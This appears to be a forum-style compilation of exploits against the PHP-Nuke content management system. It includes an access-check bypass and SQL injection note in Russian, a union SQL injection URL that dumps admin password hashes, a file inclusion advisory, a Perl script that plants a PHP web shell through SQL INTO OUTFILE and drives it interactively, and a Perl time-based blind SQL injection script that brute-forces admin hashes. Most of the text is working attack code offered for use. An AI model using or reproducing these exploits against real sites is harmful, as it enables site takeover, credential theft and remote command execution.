Product: Module: UserControl Author: [email protected] Version: V.1.0 Blind-SQL file: admin/modules/usercontrol.php В самом начале файла,защита: PHP: if (!eregi("admin.php", $_SERVER['PHP_SELF'])) { die ("Access Denied"); } global $prefix, $db; $aid = substr("$aid", 0,25); $row = $db->sql_fetchrow($db->sql_query("SELECT radminsuper FROM " . $prefix . "_authors WHERE aid='$aid'")); if ($row['radminsuper'] == 1) { $module_name = "usercontrol"; get_lang($module_name); Тоесть,вызвать скрипт можно только из админки.Простой и элегантный обход Вызываем скрипт,например так: target: http://example.com/admin/modules/usercontrol.php//admin.php?prefix={SQL} Пробывал на никсах и окошках - прошло на ура. Далее, $aid Как видим урезаеться до 25 символов.Если уложитесь - крутите через нее.Если нет - то есть еще $prefix
# Exploit Title: [PHP-Nuke 'friend.php' Module Remote SQL Injection] # Date: [05.05.2010] # Author: [CMD] # Contact : [email protected] # Version: [all version] Example1: Code: www.target.com/friend.php?op=FriendSend&sid=392/**/and/**/1=0/**/union/**/select/**/group_concat(aid,0x3a,pwd)/**/from/**/authors/**/where/**/radminsuper=1/* Example2: Code: www.target.com/friend.php?op=FriendSend&sid=392/**/and/**/1=0/**/union/**/select/**/group_concat(aid,0x3a,pwd)/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
Topic : Php-Nuke Bug type : Local File Include Vulnerability Author : ItSecTeam ===================== Content ====================== ( # Advisory Content : Php-Nuke Lastest Version ( # Mail : [email protected] ( # Dork : Php-Nuke Lastest Version ( # We Are : [email protected] , 0xd41684c654 And All Team Members! ( # Find By : Amin Shokohi(Pejvak!) ( # Published: 2010-03-14 ================================================= ============================================= Exploit ======================================= ( * http://Site.cOm/PHP-Nuke/modules.php?view=0&name=Folder Name&file=File Name ( Ex : http://Site.cOm/PHP-Nuke/modules.php?view=0&name=Content/admin&file=panel =================================================================================== # PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit # Author/s: Dante90 & yawn # Contact Us: www.unitx.net # Requirements: magic_quotes_gpc : off # Greetings: #[email protected] | #[email protected] # You will remember, Watson, how the dreadful business of the # Abernetty family was first brought to my notice by the depth which the # parsley had sunk into the butter upon a hot day. # -- Sherlock Holmes PHP: use strict; use warnings; use LWP::UserAgent; use HTTP::Cookies; sub Nuke::Usage { print " \n [0-Day] PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit\n"; print " ------------------------------------------------------ \n"; print " * USAGE: *\n"; print " * cd [Local Disk]:\\ *\n"; print " * perl name_exploit.pl [host] [username] [password] *\n"; print " * -> REMEMBER TO ADD THE FINAL / TO THE HOSTNAME <- *\n"; print " ------------------------------------------------------ \n"; print " * Powered By Dante90 & yawn *\n"; print " * www.unitx.net *\n"; print " ------------------------------------------------------ \n"; } #VARS system $^O eq 'MSWin32' ? 'cls' : 'clear'; Nuke::Usage(); my $host = shift || die; my $cmd; my $shell = "<?php echo system(\$_GET[\"cmd\"]); ?>"; # Change Here to Set your custom shell (for example use system() ); my $cookies = HTTP::Cookies->new; my $request = LWP::UserAgent->new; $request->agent("Mozilla 5/0"); $request->cookie_jar($cookies); #END VARS sub Full_Path_Disclosure() { my $Get = $request->get($host.'themes/NukeNews/theme.php'); if ($Get->content =~ /No such file or directory in <b>(.+?)<\/b> on line/i) { return $1; } else { return "failed"; } } print " * Getting Full Path\n"; my $path = Full_Path_Disclosure(); die " * Failed Path Extraction" if ($path eq "failed"); $path =~ s/themes(\/|\\)NukeNews(\/|\\)theme.php//g; print " * Full Path Found: $path\n"; if ($path =~ m/\\/) { $path =~ s/\\/\\\\\\\\/g; } print " * Injecting Shell To $host\n"; my $req2= $request->post($host."modules.php?name=Your_Account&op=activate&username=WTF", { check_num => "'UNION/**/SELECT 1,2,3,4,5,6,'".$shell."' FROM `nuke_authors` INTO OUTFILE '$path"."rce.php", }, Referer => $host."index.php"); print " * Injecting Successfully Completed\n"; print " * Shell now available on $host"."rce.php\n"; print " * Connecting to remote shell\n"; sleep(4); print " * Connected.. Type \"quit\" to quit\n"; while() { print "* root\@backdoor ~\$ "; $cmd = <>; chomp($cmd); last if $cmd eq "quit"; $req2 = $request->get($host."/rce.php?cmd=".$cmd); print $req2->content."\n"; } # [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection # Date: 2010.07.04 after 50 days the bug was discovered. # Author/s: Dante90, WaRWolFz Crew # Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero, s3rg3770, # Shades Master, V1R5, yeat # Special Greetings To: Thearadox # Greetings To: Shotokan-The Hacker, _mRkZ_, h473 # Web Site: www.warwolfz.org # My Wagend (Dante90): dante90wwz.altervista.org # ---- # Why have I decided to publish this? # Because some nice guys (Dr.0rYX and Cr3w-DZ) have ripped and published # my own exploit, with their names. # FU**ING LAMERS / RIPPERS / SCRIPT KIDDIE # ---- PHP: #!/usr/bin/perl # [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection # Date: 2010.07.04 after 50 days the bug was discovered. # Author/s: Dante90, WaRWolFz Crew # Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero, s3rg3770, # Shades Master, V1R5, yeat # Special Greetings To: The:Paradox # Greetings To: Shotokan-The Hacker, _mRkZ_, h473 # Web Site: www.warwolfz.org # My Wagend (Dante90): dante90wwz.altervista.org # ---- # Why have I decided to publish this? # Because some nice guys (Dr.0rYX and Cr3w-DZ) have ripped and published # my own exploit, with their names. # FU**ING LAMERS / RIPPERS / SCRIPT KIDDIE # ---- use strict; use warnings; use LWP::UserAgent; use HTTP::Cookies; use HTTP::Headers; use Time::HiRes; my $Victime = shift or &usage; my $Hash = ""; my ($Referer,$Time,$Response); my ($Start,$End); my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102); my $HostName = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link my $Method = HTTP::Request->new(POST => $HostName.'modules.php?name=Downloads&d_op=Add'); my $Cookies = new HTTP::Cookies; my $UserAgent = new LWP::UserAgent( agent => 'Mozilla/5.0', max_redirect => 0, cookie_jar => $Cookies, default_headers => HTTP::Headers->new, ) or die $!; my $WaRWolFz = "http://www.warwolfz.org/"; my $DefaultTime = request($WaRWolFz); my $Post; sub Blind_SQL_Jnjection { my ($dec,$hex,$Victime) = @_; return "http://www.warwolfz.org/' UNION/**/SELECT IF(SUBSTRING(pwd,${dec},1)=CHAR(${hex}),benchmark(250000000,CHAR(0)),0) FROM nuke_authors WHERE aid='${Victime}"; } for(my $I=1; $I<=32; $I++){ #N Hash characters for(my $J=0; $J<=15; $J++){ #0 -> F $Post = Blind_SQL_Jnjection($I,$chars[$J],$Victime); $Time = request($Post); sleep(3); refresh($HostName, $DefaultTime, $chars[$J], $Hash, $Time, $I); if ($Time > 4) { $Time = request($Post); refresh($HostName, $DefaultTime, $chars[$J], $Hash, $Time, $I); if ($Time > 4) { syswrite(STDOUT,chr($chars[$J])); $Hash .= chr($chars[$J]); $Time = request($Post); refresh($HostName, $DefaultTime, $chars[$J], $Hash, $Time, $I); last; } } } if($I == 1 && length $Hash < 1 && !$Hash){ print " * Exploit Failed *\n"; print " -------------------------------------------------------- \n"; exit; } if($I == 32){ print " * Exploit Successfully Executed *\n"; print " -------------------------------------------------------- \n"; system("pause"); } } sub request{ $Post = $_[0]; $Start = Time::HiRes::time(); my $Response = $UserAgent->post($HostName.'modules.php?name=Downloads&d_op=Add', { title => "Dante90", url => $Post, description => "WaRWolFz Crew", auth_name => "Dante90", email => "dante90.dmc4\@hotmail.it", filesize => "1024", version => "1", homepage => "http://www.warwolfz.org/", d_op => "Add" }, Referer => $HostName.'modules.php?name=Downloads&d_op=Add'); $Response->is_success() or die "$HostName : ", $Response->message, "\n"; $End = Time::HiRes::time(); $Time = $End - $Start; return $Time; } sub usage { system("cls"); { print " \n [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection Exploit\n"; print " -------------------------------------------------------- \n"; print " * USAGE: *\n"; print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n"; print " * perl name_exploit.pl [victime] *\n"; print " -------------------------------------------------------- \n"; print " * Powered By Dante90, WaRWolFz Crew *\n"; print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n"; print " ------------------------------------------------------- \n"; }; exit; } sub refresh { system("cls"); { print " \n [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection Exploit\n"; print " -------------------------------------------------------- \n"; print " * USAGE: *\n"; print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n"; print " * perl name_exploit.pl [victime] *\n"; print " -------------------------------------------------------- \n"; print " * Powered By Dante90, WaRWolFz Crew *\n"; print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n"; print " ------------------------------------------------------- \n"; }; print " * Victime Site: " . $_[0] . "\n"; print " * Default Time: " . $_[1] . " seconds\n"; print " * BruteForcing Hash: " . chr($_[2]) . "\n"; print " * BruteForcing N Char Hash: " . $_[5] . "\n"; print " * SQL Time: " . $_[4] . " seconds\n"; print " * Hash: " . $_[3] . "\n"; } #WaRWolFz Crew
